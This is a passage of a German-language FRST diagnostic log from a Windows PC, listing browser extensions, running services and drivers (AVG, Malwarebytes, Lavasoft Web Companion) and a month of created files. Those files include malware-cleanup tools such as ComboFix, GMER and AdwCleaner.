Extension: (Chrome Hotword Shared Module) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-26] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-03] CHR Extension: (Google Mail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-03] CHR HKLM-x32\...\Chrome\Extension: [ccahoghmggldkcdjiebjkidpfongdfbl] - <kein Path/update_url> ==================== Dienste (Nicht auf der Ausnahmeliste) ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1560592 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3637160 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [335656 2015-08-24] (AVG Technologies CZ, s.r.o.) 
R2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [63968 2015-05-21] (CyberGhost S.R.L) R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd) S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation) S3 Microsoft Office Groove Audit Service; D:\Wuala\microsoft office\Office12\GrooveAuditService.exe [65824 2006-10-27] (Microsoft Corporation) R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15122208 2013-10-18] (NVIDIA Corporation) R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-01-15] () S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation) R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1205136 2015-08-26] () S2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [X] S2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [X] ===================== Treiber (Nicht auf der Ausnahmeliste) ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.) R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [77760 2015-07-09] (AVG Technologies CZ, s.r.o.) R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313264 2015-08-19] (AVG Technologies CZ, s.r.o.) R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [297904 2015-08-19] (AVG Technologies CZ, s.r.o.) R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [259040 2015-06-16] (AVG Technologies CZ, s.r.o.) 
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.) R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [250800 2015-08-04] (AVG Technologies CZ, s.r.o.) R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.) R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [300464 2015-08-04] (AVG Technologies CZ, s.r.o.) R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation) R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-09-19] (Disc Soft Ltd) S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation) S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation) R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] () R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-28] (NVIDIA Corporation) R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc) R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc) R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc) S3 catchme; \??\C:\ComboFix\catchme.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 
2015-09-28 23:12 - 2015-09-28 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2015-09-28 23:09 - 2015-09-28 23:09 - 00000000 ____D C:\Program Files (x86)\Microsoft Works 2015-09-28 23:09 - 2015-09-28 23:09 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 2015-09-28 23:06 - 2015-09-28 23:06 - 00000000 ____D C:\Program Files\Microsoft Office 2015-09-28 23:06 - 2015-09-28 23:06 - 00000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 8 2015-09-28 18:12 - 2015-09-28 18:12 - 02870984 _____ (ESET) C:\Users\Kenny G\Downloads\esetsmartinstaller_deu.exe 2015-09-27 20:55 - 2014-05-14 18:23 - 02477536 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00700384 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00058336 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe 2015-09-27 20:55 - 2014-05-14 18:23 - 00044512 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00038880 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll 2015-09-27 20:55 - 2014-05-14 18:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll 2015-09-27 20:55 - 2014-05-14 18:21 - 02620928 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll 2015-09-27 20:55 - 2014-05-14 18:20 - 00097792 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll 2015-09-27 20:55 - 2014-05-14 18:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll 2015-09-27 20:54 - 2014-05-14 09:23 - 00198600 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll 2015-09-27 20:54 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll 2015-09-27 20:54 - 2014-05-14 09:20 - 00036864 _____ (Microsoft Corporation) 
C:\Windows\system32\wuapp.exe 2015-09-27 20:54 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe 2015-09-23 13:01 - 2015-09-23 13:01 - 00001143 _____ C:\Users\Kenny G\Desktop\Fixlist.txt 2015-09-23 06:35 - 2015-09-23 06:35 - 00000000 ____D C:\Windows\system32\SPReview 2015-09-23 05:40 - 2015-09-29 09:44 - 00001210 _____ C:\Windows\setupact.log 2015-09-23 05:40 - 2015-09-29 09:22 - 00464032 _____ C:\Windows\system32\FNTCACHE.DAT 2015-09-23 05:40 - 2015-09-29 09:22 - 00006624 _____ C:\Windows\PFRO.log 2015-09-23 05:40 - 2015-09-23 05:40 - 00000000 _____ C:\Windows\setuperr.log 2015-09-23 05:31 - 2015-09-23 05:31 - 00001589 _____ C:\Users\Kenny G\Desktop\mabam neu.txt 2015-09-23 05:28 - 2015-09-23 07:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2015-09-23 04:59 - 2015-09-23 04:59 - 00000000 ____D C:\Users\Kenny G\Downloads\FRST-OlderVersion 2015-09-23 04:58 - 2015-09-28 23:14 - 00120216 _____ C:\Users\Kenny G\AppData\Local\GDIPFONTCACHEV1.DAT 2015-09-22 06:36 - 2015-09-22 06:36 - 00001583 _____ C:\Users\Kenny G\Desktop\neu.txt 2015-09-21 18:38 - 2015-09-21 18:38 - 00028509 _____ C:\ComboFix.txt 2015-09-21 18:13 - 2011-06-26 08:45 - 00256000 _____ C:\Windows\PEV.exe 2015-09-21 18:13 - 2010-11-07 19:20 - 00208896 _____ C:\Windows\MBR.exe 2015-09-21 18:13 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00098816 _____ C:\Windows\sed.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00080412 _____ C:\Windows\grep.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00068096 _____ C:\Windows\zip.exe 2015-09-21 18:12 - 2015-09-21 18:38 - 00000000 ____D C:\Qoobox 2015-09-21 18:12 - 2015-09-21 18:36 - 00000000 ____D C:\Windows\erdnt 2015-09-21 18:10 - 2015-09-21 18:10 - 05635484 ____R (Swearware) C:\Users\Kenny 
G\Downloads\ComboFix.exe 2015-09-20 19:56 - 2015-09-20 19:56 - 00000000 _____ C:\Users\Kenny G\Desktop\Neues Textdokument.txt 2015-09-20 19:46 - 2015-09-20 19:46 - 00040674 _____ C:\Users\Kenny G\Desktop\AVG log.csv 2015-09-20 19:42 - 2015-09-20 19:35 - 00058541 _____ C:\Users\Kenny G\Desktop\FRST.txt 2015-09-20 19:42 - 2015-09-20 19:35 - 00044699 _____ C:\Users\Kenny G\Desktop\Addition.txt 2015-09-20 19:42 - 2015-09-20 18:20 - 00054932 _____ C:\Users\Kenny G\Desktop\mbam-log-2015-09-20 (17-46-10).xml 2015-09-20 19:29 - 2015-09-20 19:30 - 00032570 _____ C:\Users\Kenny G\Desktop\GMER.txt 2015-09-20 19:19 - 2015-09-20 19:19 - 00380416 _____ C:\Users\Kenny G\Downloads\Gmer-19357.exe 2015-09-20 19:17 - 2015-09-23 05:01 - 00040133 _____ C:\Users\Kenny G\Downloads\Addition.txt 2015-09-20 19:16 - 2015-09-29 09:48 - 00019716 _____ C:\Users\Kenny G\Downloads\FRST.txt 2015-09-20 19:15 - 2015-09-29 09:47 - 00000000 ____D C:\FRST 2015-09-20 19:14 - 2015-09-23 04:59 - 02192384 _____ (Farbar) C:\Users\Kenny G\Downloads\FRST64.exe 2015-09-20 19:14 - 2015-09-20 19:14 - 00000476 _____ C:\Users\Kenny G\Downloads\defogger_disable.log 2015-09-20 19:14 - 2015-09-20 19:14 - 00000000 _____ C:\Users\Kenny G\defogger_reenable 2015-09-20 19:13 - 2015-09-20 19:13 - 00050477 _____ C:\Users\Kenny G\Downloads\Defogger.exe 2015-09-20 19:07 - 2015-09-20 19:07 - 00000000 ____D C:\Users\Kenny G\Desktop\Festplatte 2015-09-20 18:19 - 2015-09-20 18:19 - 00004680 _____ C:\Users\Kenny G\Desktop\JRT.txt 2015-09-20 18:00 - 2015-09-20 18:00 - 01798976 _____ (Malwarebytes) C:\Users\Kenny G\Downloads\JRT.exe 2015-09-20 17:43 - 2015-09-23 04:58 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2015-09-20 17:42 - 2015-09-20 17:42 - 00001157 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-09-20 17:42 - 
00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2015-09-20 17:36 - 2015-09-20 17:38 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Kenny G\Downloads\mbam-setup-2.1.8.1057.exe 2015-09-20 17:36 - 2015-09-20 17:37 - 01662976 _____ C:\Users\Kenny G\Downloads\AdwCleaner_5.008.exe 2015-09-19 17:14 - 2015-09-19 17:15 - 01457952 _____ C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe 2015-09-19 16:17 - 2015-09-19 16:48 - 00000000 ____D C:\Windows\system32\MRT 2015-09-19 16:16 - 2015-09-19 16:16 - 00000000 ____D C:\Windows\system32\EventProviders 2015-09-19 16:13 - 2010-11-05 03:57 - 01942856 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll 2015-09-19 16:13 - 2010-11-05 03:57 - 00048976 _____ (Microsoft Corporation) C:\Windows\system32\netfxperf.dll 2015-09-19 16:12 - 2010-11-20 15:33 - 01924480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys 2015-09-19 16:12 - 2010-11-20 15:33 - 01659776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys 2015-09-19 16:12 - 2010-11-20 15:33 - 00299392 _____ (Microsoft Corporation) C:\Windows\system32\mcupdate_GenuineIntel.dll 2015-09-19 16:12 - 2010-11-20 15:33 - 00273792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys 2015-09-19 16:12 - 2010-11-20 15:28 - 01731936 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 14633472 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 14174208 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll 2015-09-19 16:12 - 2010-11-20 15:27 - 08988160 
C:\Windows\SysWOW64\explorer.exe 2015-09-19 16:11 - 2010-11-20 14:17 - 01049600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe 2015-09-19 16:11 - 2010-11-20 14:17 - 00302592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe 2015-09-19 16:11 - 2010-11-20 14:17 - 00220672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mcbuilder.exe 2015-09-19 16:11 - 2010-11-20 14:17 - 00192000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskeng.exe 2015-09-19 16:11 - 2010-11-20 14:08 - 00837632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll 2015-09-19 16:11 - 2010-11-20 14:08 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll 2015-09-19 16:11 - 2010-11-20 13:04 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys 2015-09-19 16:11 - 2010-11-20 12:52 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys 2015-09-19 16:11 - 2010-11-20 12:44 - 00229888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\1394ohci.sys 2015-09-19 16:11 - 2010-11-20 11:58 - 00244224 _____ (Microsoft Corporation) C:\Windows\system32\vmicsvc.exe 2015-09-19 16:11 - 2010-11-20 11:28 - 00468992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00514560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\csc.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00413184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00167936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys 2015-09-19 16:11 - 2010-11-20 11:27 - 00158208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys 2015-09-19 16:11 - 2010-11-20 11:26 - 00328192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\udfs.sys 2015-09-19 16:11 - 2010-11-20 11:26 - 00287744 _____ 
(Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys 2015-09-19 16:11 - 2010-11-20 11:25 - 00753664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys 2015-09-19 16:11 - 2010-11-20 11:23 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys 2015-09-19 16:11 - 2010-11-20 11:23 - 00261632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys 2015-09-19 16:11 - 2010-11-20 11:21 - 00119296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys 2015-09-19 16:11 - 2010-11-20 05:52 - 00419880 _____ C:\Windows\SysWOW64\locale.nls 2015-09-19 16:11 - 2010-11-20 05:52 - 00419880 _____ C:\Windows\system32\locale.nls 2015-09-19 16:11 - 2010-11-05 03:58 - 00049488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netfxperf.dll 2015-09-19 16:11 - 2009-07-14 03:16 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tcpmonui.dll 2015-09-19 16:10 - 2010-11-20 15:44 - 01077248 _____ (Microsoft Corporation) C:\Windows\system32\Narrator.exe 2015-09-19 16:10 - 2010-11-20 15:34 - 00363392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgrx.sys 2015-09-19 16:10 - 2010-11-20 15:34 - 00071552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys 2015-09-19 16:10 - 2010-11-20 15:34 - 00034688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storvsc.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00410496 _____ (Intel Corporation) C:\Windows\system32\Drivers\iaStorV.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00263040 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll 2015-09-19 16:10 - 2010-11-20 15:33 - 00213888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdyboost.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00171392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scsiport.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00152960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00140672 _____ 
(Microsoft Corporation) C:\Windows\system32\Drivers\msdsm.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00103808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sbp2port.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00095616 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00094592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00078720 _____ (Hewlett-Packard Company) C:\Windows\system32\Drivers\HpSAMD.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00075136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00063360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\termdd.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00052096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winhv.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00031104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msahci.sys 2015-09-19 16:10 - 2010-11-20 15:33 - 00027520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Diskdump.sys 2015-09-19 16:10 - 2010-11-20 15:32 - 02217856 _____ (Microsoft Corporation) C:\Windows\system32\bootres.dll 2015-09-19 16:10 - 2010-11-20 15:32 - 00334208 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys 2015-09-19 16:10 - 2010-11-20 15:32 - 00179072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys 2015-09-19 16:10 - 2010-11-20 15:32 - 00155520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ataport.sys 2015-09-19 16:10 - 2010-11-20 15:32 - 00112000 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe 2015-09-19 16:10 - 2010-11-20 15:32 - 00027008 _____ (Advanced Micro Devices) C:\Windows\system32\Drivers\amdxata.sys 2015-09-19 16:10 - 2010-11-20 15:28 - 00780008 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll 2015-09-19 16:10 - 2010-11-20 15:28 - 00223248 _____ (Microsoft Corporation) 
C:\Windows\system32\Drivers\fvevol.sys 2015-09-19 16:10 - 2010-11-20 15:28 - 00166784 _____ (Microsoft Corporation) C:\Windows\system32\basecsp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 02851840 _____ (Microsoft Corporation) C:\Windows\system32\themeui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 02250752 _____ (Microsoft Corporation) C:\Windows\system32\SensorsCpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 02193920 _____ (Microsoft Corporation) C:\Windows\system32\themecpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 01689600 _____ (Microsoft Corporation) C:\Windows\system32\netcenter.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 01363968 _____ (Microsoft Corporation) C:\Windows\system32\wdc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 01160192 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL 2015-09-19 16:10 - 2010-11-20 15:27 - 01120768 _____ (Microsoft Corporation) C:\Windows\system32\sdengin2.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 01031680 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00933376 _____ (Microsoft Corporation) C:\Windows\system32\SmiEngine.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00812032 _____ (Microsoft Corporation) C:\Windows\system32\wpccpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00799744 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00691200 _____ (Microsoft Corporation) C:\Windows\system32\VAN.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00658432 _____ (Microsoft Corporation) C:\Windows\system32\PerfCenterCPL.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00633344 _____ (Microsoft Corporation) C:\Windows\system32\riched20.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00624128 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00611840 _____ (Microsoft Corporation) 
C:\Windows\system32\wpd_ci.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00568832 _____ (Microsoft Corporation) C:\Windows\system32\scrptadm.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00509952 _____ (Microsoft Corporation) C:\Windows\system32\ntshrui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00486400 _____ (Microsoft Corporation) C:\Windows\system32\powercpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00483840 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00475136 _____ (Microsoft Corporation) C:\Windows\system32\wlangpui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00462336 _____ (Microsoft Corporation) C:\Windows\system32\wiadefui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\nshipsec.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00429568 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00418816 _____ (Microsoft Corporation) C:\Windows\system32\sppwinob.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00416256 _____ (Microsoft Corporation) C:\Windows\system32\prnfldr.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00414208 _____ (Microsoft Corporation) C:\Windows\system32\wlanui.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\scesrv.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00403968 _____ (Microsoft Corporation) C:\Windows\system32\untfs.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\mtxclu.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00367104 _____ (Microsoft Corporation) C:\Windows\system32\wcncsvc.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00366080 _____ (Microsoft Corporation) C:\Windows\system32\zipfldr.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00357888 _____ (Microsoft Corporation) 
C:\Windows\system32\sharemediacpl.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00344064 _____ (Microsoft Corporation) C:\Windows\system32\rasmans.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\srchadmin.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\msieftp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\tapisrv.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00300032 _____ (Microsoft Corporation) C:\Windows\system32\pdh.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00290304 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00268288 _____ (Microsoft Corporation) C:\Windows\system32\MSAC3ENC.DLL 2015-09-19 16:10 - 2010-11-20 15:27 - 00264192 _____ (Microsoft Corporation) C:\Windows\system32\upnp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\onex.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00232960 _____ (Microsoft Corporation) C:\Windows\system32\scecli.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00232448 _____ (Microsoft Corporation) C:\Windows\system32\sppcomapi.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00225280 _____ (Microsoft Corporation) C:\Windows\system32\SndVolSSO.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\wmpsrcwp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00222720 _____ (Microsoft Corporation) C:\Windows\system32\wwanconn.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\netiohlp.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00214016 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll 2015-09-19 16:10 - 2010-11-20 15:27 - 00211456 _____ (Microsoft Corporation) C:\Windows\system32\rasppp.dll 
